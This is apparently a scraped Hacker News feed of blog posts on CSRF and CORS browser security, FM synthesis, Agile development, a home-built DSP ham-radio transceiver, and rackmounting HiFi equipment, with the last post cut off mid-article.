    CSRF stands for Cross-Site Request Forgery. It was rather popular in the earlier internet but now it’s almost a non-issue thanks to standard prevention mechanisms built into most of popular web frameworks. The forgery is to make user click on a form that will send a cross-site request. The protection is to check that the request didn’t come from a third-party site.

    CORS stands for Cross-Origin Resource Sharing. It’s a part of HTTP specification that describes how to permit certain cross-site requests. This includes preflight requests and response headers that state which origins are allowed to send requests.

    So, by default, are cross-origin requests allowed and we need CSRF protection, or they are forbidden and we need CORS to allow them? The answer is both.

    The default behaviour

    The default behaviour is defined by Same-origin policy, and is enforced by browsers. The policy states that, generally speaking, cross-site writes are allowed, and cross-site reads are not. You can send a POST request by submitting a form, you browser won’t let you read the response of it.

    There is a newer part of this spec that sort of solves CSRF. In 2019, there was an initiative to change default cookies behaviour. Before that, cookies were always sent in cross-site requests. The default was changed to not send cookies in cross-site POST requests. To do that, a new SameSite attribute for the set-cookie header was introduced. The attribute value to make the old default is None, and the new default would be Lax.

    In 2025, 96% browsers support the SameSite attribute, and 75% support the new default. Notably, Safari haven’t adopted the default, and UCBrowser doesn’t support any nice things.

    Sidenote: I can’t understand how UCBrowser remains relatively popular among users, given that there are settings in js builders to build for N% of the users and next to nobody puts 99% there.

    Sidenote 2: Origin is not the same as Site. Origin is a combination of a scheme, a hostname, and a port. Site is a combination of scheme and effective top level domain + 1. Subdomains and ports don’t matter for sites.

    Links: Same-origin policy | caniuse SameSite cookie attribute

    CORS

    CORS is a way to override the same origin policy per origin.

    The spec describes a certain browser-server interaction. Browser sends preflight requests of type OPTIONS before actual requests, server replies with rules for the origin. The rules are in a form of response headers. The rules may specify if the reply can be read, if headers can be sent and received, allowed HTTP methods. Header names start with Access-Control. Browser then follows the rules.

    CORS applies for several types of the requests:

    • js-initiated fetch and XMLHttpRequest
    • web fonts
    • webgl textures
    • images/video frames drawn to a canvas using drawImage
    • css shapes from images

    What is notoriously not in this list is form submissions, otherwise known as simple requests. This is part of the internet being backward-compatible:

    The motivation is that the <form> element from HTML 4.0 (which predates cross-site fetch() and XMLHttpRequest) can submit simple requests to any origin, so anyone writing a server must already be protecting against cross-site request forgery (CSRF). Under this assumption, the server doesn’t have to opt-in (by responding to a preflight request) to receive any request that looks like a form submission, since the threat of CSRF is no worse than that of form submission. However, the server still must opt-in using Access-Control-Allow-Origin to share the response with the script.

    From the CORS page on MDN.

    Question to readers: How is that in line with the SameSite initiative?

    CSRF protection

    So, cross-site write requests are allowed, but responses won’t be shared. At the same time, as website developers, we mostly don’t want to allow that.

    The standard protection is to include into a write request a user-specific token available only on read:

    • for forms this token is put into a hidden input,
    • for js-initiated requests the token can be stored in a cookie or in a meta tag, and is put into params or request headers.

    JS-initiated requests are not allowed cross-site by default anyway, but they are allowed same-site. Adding a csrf token into js requests lets us do the check the same way for all the requests.

    This way we still depend on browser in a way that it still has to prevent responses to be read cross-site by default, but a bit less than if we were also reading something like Origin request header instead of checking for the token.

    Question to readers: In some of the frameworks CSRF tokens are rotated. Why?

    Browser is important

    I want to emphasise how important browsers are in this whole security scheme. All the client state for all the sites is stored in browser, and it decides which parts to expose and when. It’s browsers that enforce Same-origin policy, it’s browsers that don’t let read responses if it’s not allowed by server. It’s browsers that decide if they adopt the new SameSite=Lax default. It’s browsers that implement CORS and send safe preflight requests before actual PATCH or DELETE.

    We really have to trust browsers that we use.

    Conclusion

    What I learned

    The internet will become more secure and maybe a bit less backward-compatible when the SameSite=Lax default will be adopted by 100% of the browsers. Until then, we will have to live with the situation where simple POST requests are special and allowed cross-site, while others fall into the CORS bucket.

    Thanks Nikita Skazki for reviewing this post more times than I care to admit.

    This post on Hackernews

    Sources

    1. Same-origin policy
    2. caniuse SameSite cookie attribute
    3. OWASP CSRF cheatsheet
    4. CORS wiki with requirements
    5. CORS spec
    6. CORS on MDN
    7. Preflight request
    8. Origin request header
    9. Origin and Site
    ]]>
    https://smagin.fyi/posts/cross-site-requests/ hacker-news-small-sites-43231411 Sun, 02 Mar 2025 15:32:46 GMT
    <![CDATA[Show HN: Interactive Intro to FM Synthesis]]> thread link) | @crowselect
    March 2, 2025 | https://crowselectromusic.com/tools/fm-intro/ | archive.org

    Frequency Modulation (FM) synthesis is a way of creating a wide range of sounds by modulating (changing over time) the frequency of an oscillator using another oscillator.

    It starts with very simple elements: two oscillators. The first, called the "carrier" oscillator, is wired so it can be heard, and then the second "modulator" oscillator is wired to the frequency control of the carrier. As the modulator oscillates, it speeds up and slows down the oscillations of the carrier. If the modulator oscillator is at a slow speed and intensity, this creates an effect usually called "vibrato" - but when the modulator is oscillating fast, in the audible range (20hz to 20,000hz), it's called FM synthesis.

    A diagram visualizing the carrier, modulator, and output of FM synthesis

    As the image above hints at, the resulting frequency modulated wave is much more complex than either the carrier oscillator, the modulator oscillator, or the two simply mixed together and heard.

    If your browser supports WebAudio, you can use the tool below to explore a simple FM setup - one carrier and one modulator. If you're not hearing sound, check that your phone isn't on silent.

    Carrier Oscillator Frequency:

    Modulator Oscillator Frequency:

    Modulation Amount:

    Using this basic idea we can create extremely complex FM synthesis setups, that generate an almost infinite range of sounds. But if we want the sounds to evolve over time, we need to add envelopes, to change the oscillators level or amount of modulation.

    Below is another WebAudio example of a simple two oscillator FM setup, just like the last example - but this time with a triggerable attack-release envelope controlling the level of the modulator oscillator:

    Carrier Oscillator Frequency:

    Modulator Oscillator Frequency:

    Modulator Envelope:

    1s2s3s4s5s6s

    Modulator Level Envelope Attack:

    Modulator Level Envelope Release:


    With carriers, modulators, and envelopes, accounted for all that's left is to scale up. That means using more oscillators, wired together in complex networks of modulators and carriers - usually called "algorithms". The Yamaha DX7, the instrument that popularized FM synthesis, had six oscillators that could all be used as modulators OR carriers, and they could be arranaged into 32 different algorithms.

    A chart showing the 32 algorithms available on the original DX7

    I don't have the space or the WebAudio chops to build out a full six-operator FM synth here - but if you want to dive into the deep end of FM synthesis, Matt Montag has build an amazing in-browser DX7 emulation: http://mmontag.github.io/dx7-synth-js/.

    Thanks for exploring! This tool is made by Crows Electromusic. We hand-make electronic musical instruments in Vancouver, Canada. We will be releasing an instrument that uses FM soon - subscribe to our email list below if you'd like to be notified when it's available!

    ]]>
    https://crowselectromusic.com/tools/fm-intro/ hacker-news-small-sites-43231022 Sun, 02 Mar 2025 14:53:46 GMT
    <![CDATA[Is Agile All You Need?]]> thread link) | @arijo
    March 2, 2025 | https://www.feelingbuggy.com/p/is-agile-all-you-need | archive.org

    It’s common sense that in order to build large systems, a good strategy is to start with a simple base model and iterate until the whole system satisfies the desired criteria.

    This was one of the core ideas behind the Agile Manifesto.

    But there are other, more mature, human-built systems around: in law, math, physics, biology, etc.

    Yes, we must start from a simple idea and iterate, but at some point, we have to take a step back and figure out hidden patterns and principles.

    I’m not an expert, but look at memory safety mechanisms: garbage collection at runtime and the borrow checker at compile time. These concepts didn’t just happen by going “agile all the way” to the solution.

    At some point, families of problems are categorized and defined from first principles, always looking to solve both the original specific case and the more general problem patterns that we find.

    This isn’t the common path in most software agile projects.

    Iteration is a good thing, but taking a step back to think can solve problems that wouldn’t be solvable any other way.

    I would love to hear your thoughts on this topic.

    Thank you for reading this post.

    Discussion about this post

    ]]>
    https://www.feelingbuggy.com/p/is-agile-all-you-need hacker-news-small-sites-43230885 Sun, 02 Mar 2025 14:37:42 GMT
    <![CDATA[Tiny Ten DSP-Based HF Transceiver]]> thread link) | @wglb
    March 2, 2025 | https://www.janbob.com/electron/TinyTen/TinyTen.htm | archive.org

    A tour of the insides of a home-built, light in weight, Ten Watt, Ten Band Amateur Radio Transmitter/Receiver.

    A Teensy 4.1 based transceiver that makes extensive use of the OpenAudio_ArduinoLibrary.

    Bob W7PUA


    Tiny Ten Radio

    Introduction - This all started while on a backpack in Oregon's Cascade Mountains. We enjoyed the beautiful scenery of our alpine valley. The lake in front of the tent was crystal clear and reflected the surrounding mountains. But, radio signals were all shielded from us. Not only were there no Cell signals, but we could only receive one weak FM broadcast station. The folks back home would really like to know that the bears had not gotten us, but it was not to be (they didn't). I had a 5-Watt 2-meter hand held radio along, but that could not bring up any repeater, even using a half-wave antenna. Then, I remembered being out with Lew, N6QKP, on a similar trip, and he used his Elecraft KX-2 to easily make 75-meter contacts with a simple dipole antenna. This was on SSB and it seemed easy, even in places VHF signals don't get to. The logical conclusion was that I needed one of those.

    But logic doesn't always apply. Maybe the KX2 solution was too easy. Maybe it was the challenge of a new design. Certainly, one factor was my familiarity with the Teensy 4.1 and the associated floating point DSP library. But, in any event, I charged off to design and build a radio to meet some fairly specific goals: The original idea was 10 Watts on SSB and CW in a reasonably small package weighing less than 1-pound including a battery. It was to operate on the 80/75 and 40-meter amateur bands and use DSP to the extent possible to enhance both the receiver and transmitters. It was not intended as a home station and would use a small display to both keep things simple and to limit the current draw. The plan was for many hours of receiving time and perhaps 15 minutes of full power transmit time, running off the battery with no charging.

    Well, it has been a year and a half since the project started. There were several non-radio distractions, but the radio is now in operation on all modes. The basic goals have been achieved, and as is often the case, the complexity of the radio has grown. This write-up will summarise what the Tiny Ten looks like both physically and functionally. It is not a "how to" writeup, but neither are there any secrets. If you don't see something that interests you, ask, and I'll do my best. However, I have no plans to offer boards or kits.

    A couple of words on what this radio is and what it isn't. I wanted a real radio in the sense that the receiver sensitivity, dynamic range and selectivity would not limit the ability to communicate. The transmitter needed to be able to generate clean signals and provide enough power output to communicate on CW and FT8 any time and SSB most of the time. The use of CESSB produces clean signals with the effectiveness of a 25 Watt conventional SSB transmitter. The frequency accuracy and stability needed to be right on, with no question as to where we were in the band. In addition, the weight and size needed to be back packable by an old guy. The choice of displays gets down to the second purpose for the rig, that being an opportunity to test out various ideas, such as small displays. The main reasons for the small display was low power consumption. But, it is also an opportunity to experiment with ways to make the most of a minimalist control interface. I already knew what could be done with 50 knobs and switches along with a 10-inch display. It is time to see what can be done with 8 lines of 21 characters plus graphics!

    And the architecture. I am a big fan of using double analog conversion with a "wide-band" crystal filter at the first I-F. This allows big steps, like 5 kHz, on the 1st LO which can be essentially birdie free. It provides a lot of protection from interfering signals, as the crystal filter can be early in the gain progression. And finally this gives great flexibility for clean transmitter signal generation. Examples of this approach are the DSP-10 2-meter transceiver and VU2ESE's sBitx HF transceiver (search on either). But, the Tiny Ten does not follow that path, but uses the currently popular path of single conversion to DSP frequencies. This is simpler to build and probably for a lower power portable radio is quite adequate in performance. It also gives me a chance to play with this architecture that I had not done before. I hope to say more about the testing and design of this radio, as time allows.


    Tiny Ten front panel
    The little 128x64 pixel screen changes depending on what is happening. This is the receive mode for SSB or CW. The top line is battery voltage, date and time. Line two is an error code (none now) followed by receive signal strength, first in dBm and then S-units. The big line is frequency to the Hertz. Line 4 has the mode, audio and rf gain settings. Next is the S-meter bar graph calibrated in dBm. The bottom line has the internal temperature and a couple of unused spots.

    The radio described by bullet items - This lets you see the general character of the project.

    • SSB, CW, AM, FM, FT8 (13 character text) modes
    • 10 Bands, 160 to 10-meters BUT, Plug-In Coils!
    • 1-inch 128 x 64 display, Cute and tough to read
    • 1 knob and 10 buttons
    • W9GR Controlled Envelope SSB - 3 to 4 dB increased average power
    • Built-in 7.4V 2.2AH battery
    • Battery draws 170 mA receive, 4A transmit
    • High accuracy TCXO frequency reference
    • Built-in microphone and speaker
    • Delay stereo with external 'phones or speakers
    • Regulated 14-Volt, 2 Amp DC-DC converter, used only on transmit
    • Gaussian shaped CW on transmit and receive
    • Careful control of digital noise by construction and filtering
    • 600 MHz Teensy 4.1 with ARM Cortex-M7 for both DSP and control
    • All DSP with OpenAudio_F32 floating point library
    • Battery backed real time clock.
    • Storage of settings with power off
    • No electrolytic or tantalum capacitors
    • Size 2-1/2 x 6 x 2-inches (100 x 240 x 80 mm), weight under 1 lb

    At this time (January 2025) the radio is on the air, but on 80 and 75-meters only. The peak output power is just over 15 Watts. Down below is a list of planned improvements, but for now, it probably needs some use, more than anything. Getting a simple front panel working is one thing; getting the user interface to be easy to use is another thing. On this page, we will try to provide a snap shot of what the radio is, electrically, mechanically and in software.

    Electrical Description - 22 Feb 2025. The Twin Peaks circuitry is the biggest addition.


    Here is the schematic for the back RF PCB. It includes the LO, the direct conversion I-Q mixer, the RF power amplifier and various switches. This schematic was used in KiCad to generate the images (Gerbers) needed for making the PCB.

    Click on the picture to open a readable size in a new browser tab. Close the tab or change tabs to return here.

    Not shown here is the circuitry for a GPS module to lock the transceiver frequency and provide time and grid squares. The pads are on the RF board, but it has not been populated nor tested.

    The hardware architecture is a single RF frequency converter with quadrature signals fed in and out of the DSP. Switches are used at both the RF and I-F level to go between receive and transmit. A single output of the Si5351A synthesizer is used to drive the converter and set the RF frequency. This is run through a 74ALVC74 high speed divide-by-4 to establish precise quadrature conversion signals. This sets the radio's operating frequency. A single RD16HHF MOSFET is the transmit output amplifier. The antenna relay is a latching type to save current. RF filtering and matching networks are on three small PCB; this is an experiment to achieve two objectives. First is to save the weight of multi-band filters, when only one or two bands are actually used. The second objective is to increase the efficiency of the amplifier by using a single-band optimized network rather than broad-band transformers. The two low-level networks are the size of a postage stamp and the output network is about twice that size.


    This schematic is the digital PCB. It includes the PJRC Teensy 4.1 processor, the SGTL5000 codec with stereo ADC and DAC, DC voltage conditioning and regulators, the switches, knob and display. This schematic was used in KiCad to generate the images (Gerbers) needed for making the PCB.

    Click on the picture to open a readable size in a new browser tab. Close the tab or change tabs to return here.

    The digital board centers about the Teensy 4.1 processor. This is a small board that breaks out the multitudes of processor pins as well as providing basic bypassing of power leads and DC power distribution. This both controls the radio and provides floating-point DSP for all receive and transmit signal processing. On the board is an SGTL5000 Codec for audio (I-F) input and output.The digital PCB also has an audio output amplifier that is needed whenhttp://www.janbob.com/electron/TinyTen/TinyTen.htm driving speakers.

    Capacitors were a subject of experimentation in this project. Electrolytic and tantalum capacitors have higher series inductance than multi-layer ceramic counterparts, in part because of their larger size. They also have higher series resistance. Finally, they generally have shorter lifetimes (in years) than ceramics. The capacity values available in ceramics have increased as their costs have come down. So this design was done with only ceramic capacitors, with the largest values being 100 microFarads. See this discussion of multi-layer ceramics for more information. In addition, placing multiple values of bypass capacitors in parallel results in undesired parallel resonances (see the referenced link just given and also section 2.8 of Experimental Methods in RF Design). Only identical values were paralleled in this design.

    Tuned Circuits - (New writeup as of 31 Jan 2025) For the receive path, the RF filtering consists of octave sized band pass filters. This covers 80 to 10 as 3.5 to 7.3 MHz, 7.3 to 15 MHz and 15 to 30 MHz. This arrangement works fine since the mixers have responses at the 3rd, 5th and other odd harmonics, but not at the even harmonics. The circuits come from previous projects, but instead of using a latching relay, these use a small plug-in card, seen below. The board is quite small, about 0.75-inch (19 mm) across. The header connector has 0.05-inch (1.27 mm) pin spacing


    Tiny Ten Octave Filter

    The transmit path uses the same mixer and octave filters as the receiver. This is followed by an 21 dB broadband amplifier and then a plug-in matching network to couple the amplifier to the MOSFET output amplifier. Finally, there is a plug-in matching network to transform the 5 Ohm impedance from the MOSFET to 50 Ohms for the antenna. The 21 dB driver amplifier uses a BFU590 NPN transistor and was designed as a 50 Ohm in-and-out circuit. The plug-in interstage matching network was made quite general in topology as seen next but not all of the components, such as the capacitors shunting the inductors, are used.


    Tiny Ten Interstage Matching Filter

    Following the transmit path on through, there is the Toshiba RD16HHF MOSFET and a plug-in output network. That network uses a two cascaded L-networks, intended to perfom in the spirit of the wonderful Matthaei transformers (n=4). Since these are plug-in networks, they only cover a single amateur band, providing minimum loss. To allow for best attenuation of harmonics, each inductor can be shunted with a capacitor, placing a notch in transmission at 2nd and 3rd harmonics. In its general form, the output network is shown below. It is a bigger board to allow better current carrying capacity for the connector. The pins are space 0.1-inches (2.54 mm). There is space for T37-6 toroids, as well.


    Tiny Ten Output Matching Filter

    The design approach was to omit the capacitors shunting the inductors and turn the optimizers in ARRL Radio Designer loose on providing 22 dB of gain from the MOSFET amplifier. The Radio Designer script for 10-meters shows an example of this. During optimization, the components for the driver amplifier were fixed as the 21 dB block described above. When implemented on the plug-in boards for 80/75-m, the amplifier performed as expected with output power over 10 Watts. The problem was that the 2nd and 3rd harmonics were only around -20 dB. So it was time to use the notch circuits in the output matching board. Two methods were used for this. They were added to the Radio Designer script with the notch capacitors always constrained to be at the 2nd and 3rd harmonics. This gave fine results, but the approach required setting up the optimization. For existing designs, a simple alternate approach was found to work well.

    This method of adding notches at the n-th harmonic, to a design that does not have notch capacitors, involves reducing the inductor value by a factor [1-1/(n^2)] and adding a capacitor of value 1/[(w^2)*L] where w=2*pi*n*fo, fo is the transmit frequency and L is the reduced inductor value. This results in the parallel LC having the same reactance at fo as did the original inductor and a notch at frequency n*fo.

    As things will do, the revised output network with notch capacitors did not suppress harmonics as expected. After some measurements and simulation, it was found that sharing of the ground pins on the plug-in connector caused coupling around the network. This is the result of the 20 nH, or so, inductance of the pins. This was cured by slicing the ground plane on the back of the output network board to cause the current in C3 and C4 to flow only through J1-3 and J1-4, while the current in C7 and C8 flowed only through J1-6.

    Mechanical Arrangement - Most of the radio is built on two major PCB, the digital and RF PCB's and a small DC-DC converter. There are also three small plug-in network boards. This is seen in the top photo shown next:

    Tiny Ten Top View.
    This is the view from the top with the cover removed. The digital PCB is behind the front panel so that the switches just protrude. The RF PCB is-held back-to-back with the digital PCB. The interconnects are all done by small single and double connectors with 1.27 mm spaced pins. This results in having no wires between the boards to radiate or pickup noise. This produces many of the advantages of a 4-layer PCB, but using less expensive 2-layer boards. The heat-sink bar connects between the RF output transistor and the back panel. It can be seen that it also has two screw holes to connect the top cover as a major heak-sink device. There is room on the back left corner for the battery. The three plug-in network boards can be seen at the top of the RF board. These are analogs to plug-in coils of the past and are important in that they allow low-loss coupling of RF energy by being specific to a band or bands. The Teensy 4.1 processor is on the digital board near the center, where the USB connector can be seen. The 14-Volt DC-DC converter, used only on transmit, is at the back right.

    Unpopulates Tiny Ten Digital PCB
    This is the digital board, slightly out-of-date.

    Unpopulated Tiny Ten RF PCB
    And this is the RF Board. The two boards are spaced apart, ground plane to ground plane, by two 0.25-inch (6mm) square aluminum bars. It needs updates, a well.

    DSP Software - All DSP runs at a fixed 48 kHz sample rate. This supports input frequencies up to about 22 kHz. The receive path uses double conversion principally to increase the flexibility in selection of the Si5351A frequencies to reduce birdies This makes for a first I-F of about 15 kHz. The BFO is then in DSP and essentially birdie free for any required frequency. Phasing method conversions are used at both stages. The transmit path is classic I-Q direct conversion. Using the 15 kHz I-F for transmit can have problems with imperfect carrier suppression leading to opposite side-band re-growth in the following amplifiers. The problem still exists with direct conversion, but it is spectrally hidden by the closeness to the desired side-band. This means that there are more unwanted Si5351A birdies, but they are less of an issue in transmit than in receive.

    There are various generators, filters and detectors for supporting AM, FM, FT-8, as well as one and two-tone transmitter testing. These functions all come from the floating point DSP library. The following flow diagram is produced by the Design Tool (separate from the 16-bit design tool).


    Tiny Ten DSP Block Diagram
    This is the flow diagram created by the Design Tool referenced above. It represents the flow of audio signals in the Tiny Ten radio. What is less obvious is that within the DSP software, the lines between blocks will create "connecting" objects that work with the audio streaming system to ensure that the audio data are transferred as needed. This all happens automatically once the blocks and connections are instantiated. It makes it simple system to design and program the audio/I-F processing. Note that this diagram is not up-to-date in that there is a block, not shown, for the AudioAlign_F32 library class that corrects a problem in the SGTL5000 ADC that randomly mis-aligns the I and Q channels by one sample. This sits between the audioInI2S1 and NoiseBlank1.

    The software is in a single .INO file, plus separate files for some pre-defined FIR filters. It is not currently under any control, but will end up on GitHub, eventually. Here is a copy of the .INO file, as of 21 February 2025. This is not being updated as changes are made, but it gives an idea of the program looks like. Do not attempt to compile this file. I cannot help you at this point in the design process. This file compiled for me and ran the radio, but by the time you read this, I am working on a different un-controlled file. Including quite a bit of working notes, it comes to about 2500 lines, made a bunch smaller by use of the DSP library.

    Performance - As of this date, all of the functions are working, except the AM transmit and FT-8 transmit and receive. The AM transmit has the wrong carrier level and the FT-8 is installed in the DSP but has not been tested, yet. Several CW and SSB contacts have been made with good reports. I ran the radio on Straight Key Night and made about 10 contacts. All this was on 80/75, as that is the only transmit output coils I have made. Using no pre-selection, I listened on all bands up to 6-meters. Interestingly, the LO drops out at 208 MHz, stopping the radio before 6-meters stops. I have no intention of trying to make things work at 6-meters and operation at 10-meters is reliable. The sensitivity of the receiver drops off at the higher bands apparently because the LO introduces noise (not phase noise). This needs further exploration. Power output at 3.8 MHz is limited by the RF power amplifier to 16 Watts. Ten Watts was the goal and as of this writing (22 Feb 25) the coil boards have been built for 10-meters and 12 Watts of power output has been measured. This needs further measurements before saying that 10-meters is ready.

    The CESSB works well. Signals sound good on SSB. FM seems to work fine, but I didn't spend much time on it. Opposite side-band suppression on transmit is 43 dB (single 1 kHz tone). Carrier suppression is higher. This is without any amplitude/phase corrections. There are corrections available if needed for the higher bands.

    The TCXO calibration procedure has been worked out, starting with putting the radio in the freezer. The various checks at 80/75 meters have shown the frequency to be within 1 Hz. It may not always be that good! The real-time clock works fine, and I have so far worked with the ability of the Teensy/Arduino loader to set the clock. The 2032 battery backup has worked fine.

    North American AM Broadcast Band - This is a bonus band. I made up a modified octave filter to cover 530 to 1400 kHz, in part to see how well it works and in part to be able to listen to the AM band. In order to not have a station at 1590 kHz appear at 1590/3=530 kHz, the filter was designed to have a cutoff at almost 1400 kHz. This gives up the top 300 kHz of the band. A Dremel tool was used to convert the use of L1 from a HP to a LP filter, but not using any notch with it. The other two transmission poles were built, as usual, fom L2 and L3 and associated capacitors. These two had capacitors to add notches. The component values are shown along with the graph of transmission. In general, this design is limited by the 1812 chip inductor Qu. Always a compromise. As far as performance, the sensitivity is very good, x3 frequency stations have not shown up, and the quality of the sound from the DSP envelope detector is very good. I like the synthesized stereo sound from the delay binaural.


    Attenuation vs Frequency BC Band Filter
    This is the measured transmission of the AM broadcast filter. All three inductors are 1812 RF types. All capacitors are 0805 NP0 ceramics. Component values are: L1=10uH, L2=6.8uH, L3=3.6uH, C3=1500p, C4=1500p, C7=4700p, C9=560p, C10=560p, C11=1600p, C12=1600p, C13=2700p, C15=1300p.

    Performance, I-Q Balance - [Added 16 Feb 2025] I measured the phase and amplitude balance for reception by introducing an RF signal of -50 dBm at the antenna connector coming from a Fluke 6060B synthesized signal generator. In software, a DSP phase detector from the Teensy F32 library, AudioAnalyzePhase_F32, was placed at the ADC inputs corresponding to I and Q inputs. Peak detectors were already in place, so we had accurate measurement of the analog I and Q vector voltages. These voltages are important as they are combined through phase shift networks to produce I-F signals in the 15 kHz range. If I and Q are not equal in amplitude and 90 degrees separated in phase, an image signal will be received when tuned 30 kHz below the desired one. See KK7B's detailed discussion and analysis of this in Section 9.2 of Experimental Methods in RF Design. Note that the measurements shown here are without any corrections. Two term corrections could be applied to cancel the errors. The following graph shows the measured I-Q phase shift.


    Measured I to Q phase shift
    This phase shift difference between the ADC outputs for I and Q signals was measured in DSP using the phase detector in the OpenAudio_ArduinoLibrary referenced above. The input RF signal was -50 dBm resulting in phase noise of a few tenths of a degree. The values here are the average of 1024 independent data points. Below 15 MHz or so, the phase is very close to 90 degrees. The LO conversion signals are derived from a 4:1 digital divider that is inherently producing the correct sampling pulses. Typically the phase is within 0.2 degrees, corresponding to about 50 dB of image rejection. Above 15 MHz, the phase is starting to show the effects of parasitic capacities and unmatched delay paths. Still, up to about 40 MHz, the phase error is 1 degree or less, corresponding to 40 dB of image rejection. There is an interesting peak in the I-Q phase difference at 25 MHz. I have not explored the source of that error.

    Throughout the frequency range, the amplitude match of I and Q was typically a ratio 1.004, corresponding to image rejection of 48 dB. In constructing the RF board I had the luxury of many 1% resistors and matched these up as best I could. Even the four Tayloe pulse storage capacitors were matched. This all shows up in the tight amplitude control of I and Q. Regardless, if I-Q amplitude correction was applied in the DSP, the resistor matching would be unnecessary.

    I measured the image rejection at a few RF frequencies. The measured values are consistent with the values calculated by the KK7B formulas, referenced above. Here are a couple of measurements with 14 MHz representing the lower frequency numbers and 39 MHz corresponding to a frequency with higher phase errors.

    14 MHz  |I|/|Q|=1.0035,  dPhase=89.97 deg, Image=-48 dB (calculated -49 dB)
    39 MHz  |I|/|Q|=1.0091,  dPhase=91.17 deg, Image=-37 dB (calculated -34 dB)
    
    In general, the plan for now is to proceed without using corrections, possibly adding them in later.

    Somehow I managed to get this far, forgetting to put in Twin Peaks time shifter for the SGTL5000 Codec. This was needed and has been added to the hardware and INO using the AlignLR DSP library class. At startup, before the LO has been turned on to create a receiver, an i/o pin on the Teensy is used to generate a square wave at about one fourth of the sample rate. This is introduced to both inputs of the ADC. A correlation is made between the I and Q ADC inputs with delays of 0, 1, 2 and 3 sample periods. The positive correlation is found, corresponding to the two channels being aligned. Then this shift is always made to bring the two channels into alignment. This is only required a start-up, as it never shifts while in operation.

    Performance, Audio Filters

    CW Filter Response
    This is the response of the Gaussian shaped FIR filter for CW. The 6 dB bandwidth is about 200 Hz, but the sound of the filter is not narrow. The slow roll-off with frequency is effective in preventing signals from being lost when they are tuned slightly out of the pass band. The impulse response has an envelope that is also Gaussian which minimises ringing. The filter was implemented by the filterFIRGeneral class in the OpenAudio_ArduinoLibrary.

    Planned Enhancements -

    TBD! But this will include getting FT-8 working for sending and receiving 13-character messages on non-standard FT-8 frequencies, finishing the front panel, testing on 10 and 20-meters. Probably a temperature overload sensor will be added to RF transmit output. The front panel needs marking. Plus more.

    Thank you -

    There are a lot of people who have contributed over the years to I-Q conversion technology for receiving and transmitting. Thanks to all of those. Also, K7MDL, KK7B, W7ZOI, K3KHF, W7GLF, VU2ESE, DD4WH, N6QKP, W7CQ, KF5N, AC8GY & W8TEE along with others on the T41 transceiver project, Paul Stoffregen and his associates with the Teensy processors, and Chip Audette all shared invaluable information. I did not look inside the Elecraft KX2 until after this radio was on the air, but just having seen it and used KK7P's fine software had its influence. Special thanks to KJ7ERE and KJ7EFX for patience and inspiration! Bob, W7PUA

    Back to W7PUA Home Page

    Issued 15 January, 2025. Last Revised: 22 Feb 2025 - All Copyright © Robert Larkin 2025. Hardware license: In exchange for being able to use any ideas that may be in the Tiny Ten hardware, you must never take any steps to restrict their use.

    ]]>
    https://www.janbob.com/electron/TinyTen/TinyTen.htm hacker-news-small-sites-43230864 Sun, 02 Mar 2025 14:34:50 GMT
    <![CDATA[Rackmounting that which should not be rackmounted]]> thread link) | @todsacerdoti
    March 2, 2025 | https://calbryant.uk/blog/rackmounting-that-which-should-not-be-rackmounted/ | archive.org

    Final assembly

    A few years ago I developed a few clever ways of rackmounting non-rackmount equipment so it could look neat in my HiFi rack enclosure.1 The goal was to have a professional-looking setup that would support input from my TV, spotify, Airplay, DJ controller and other sources while being able to drive a subwoofer with room correction and integrated crossover.

    As part of this I also developed some HiFiBerry accessory hardware and code to allow streaming, input selection, remote volume control and track identification.2

    The rack conversions, hardware and code weren’t used long (as I tend to change around my HiFi gear frequently) but I figured given the work I put in it’s likely useful to someone else wanting to rackmount their HiFi gear or mess with HiFiBerry hardware.

    I enjoy the idea of modular systems, especially when it comes to HiFi. The ability to swap out any part to upgrade incrementally is appealing, as well as the possibility of producing custom enclosures and panels to integrate everything together.

    What follows is a (somewhat disjointed) cronicle of my journey to build a professional looking custom 2U rack unit to combine a DAC, input selector, streaming device and power routing for my HiFi system.

    If you’re interested in doing anything similar, you may benefit from reading about the problems and solutions I’ve encountered along the way.


    1. The problem of having a rackmount enclosure is once you have one, every piece of equipment seems like it should be rackmounted. ↩︎

    2. All open sourced! See the conclusion for the code :-) ↩︎

    First prototypes

    Before this upgrade I converted a DAC (with USB beside) and phono pre-amp. I had a 1U blank plate where I drilled holes to allow it to sit behind the face plate of short equipment. This worked really well – I installed a DAC and a phono pre-amp, complete with front USB connection. Of course, this only works for items with detachable face plates so it limited what I could buy.

    The plan was to create an input selector with a pre-built 1U enclosure. It would contain a relay board, microcontroller and motorised 4-channel volume control to allow automatic selection of source while remembering the volume.

    Unit in situ with abandoned balanced input selector
    Unit in situ with abandoned balanced input selector

    I actually got quite far along with the selector project,3 but lost interest when I realised I could achieve the same thing after finding a Cambridge Audio DACMagic without spending more time.

    Relay test program running on abandoned input selector project

    The DACMagic had a volume control, input selector and balanced outputs. This was taller than 1U so I’d have to use a 2U panel if I wanted to do the same as above.

    DACMagic with standard internet reference object for scale
    DACMagic with standard internet reference object for scale

    The front panel of the new DAC was also much more complicated so the old interposing method wouldn’t have worked well; I needed to cut out a large hole surrounding the face plate this time – which meant hand-cutting it like last time was not viable.


    1. It even had a motorised volume control with custom position sensor and a small OLED display! ↩︎

    Modelling in CAD

    I chose to make the main panel out of 3mm aluminium, with 3D printed junction boxes and brackets. With OpenSCAD I used a hierarchical file layout to enable the parts to be easily separated and rendered for manufacturing while allowing an assembly view for sizing and easy layout.

    Chosen origin in OpenSCAD
    Chosen origin in OpenSCAD

    My approach was to use a co-ordinate system as above, where the origin is the on the left of the plate, half way up, at the bottom. This made most of the transformations easier and provided a half-height reference for alignment.

    Front of assembly in CAD
    Front of assembly in CAD

    I then designed several boxes to hold the various components; the boxes were attached either with brass heat-set inserts, or took advantage of the connector mounting holes.

    Back of assembly in CAD
    Back of assembly in CAD

    Given the hierarchical file layout, I could easily render the individual parts as well as the assembled whole. This allowed checking that everything would fit before manufacture; important as producing the metal face plate was expensive.

    Final plate in CAD
    Final plate in CAD

    Given OpenSCAD is able to output SVG, I also designed the panel graphics as part of the design to later UV print them at a local graphics shop.

    Top assembly in CAD
    Top assembly in CAD

    I won’t explain how the code works here, but if you’re interested I’ve put all the code in this repository. The code is reasonably well commented and documented.

    The final parts that I sent to manufacturing are here, just in case you want to make exactly the same thing.4

    As described in my OpenSCAD article, I had issues with circles in the DXF. I ended up discovering that going to SVG first, it was possible to get slightly better DXF files (the lines were connected) but not proper circles. Here’s the script to do that. I strongly suspect going via FreeCAD is a better option here. I will explain why proper circles were particularly important in this case in the next section.


    1. Unlikely, but you can view the parts and see how it all fits together without having to render the code. ↩︎

    Manufacturing

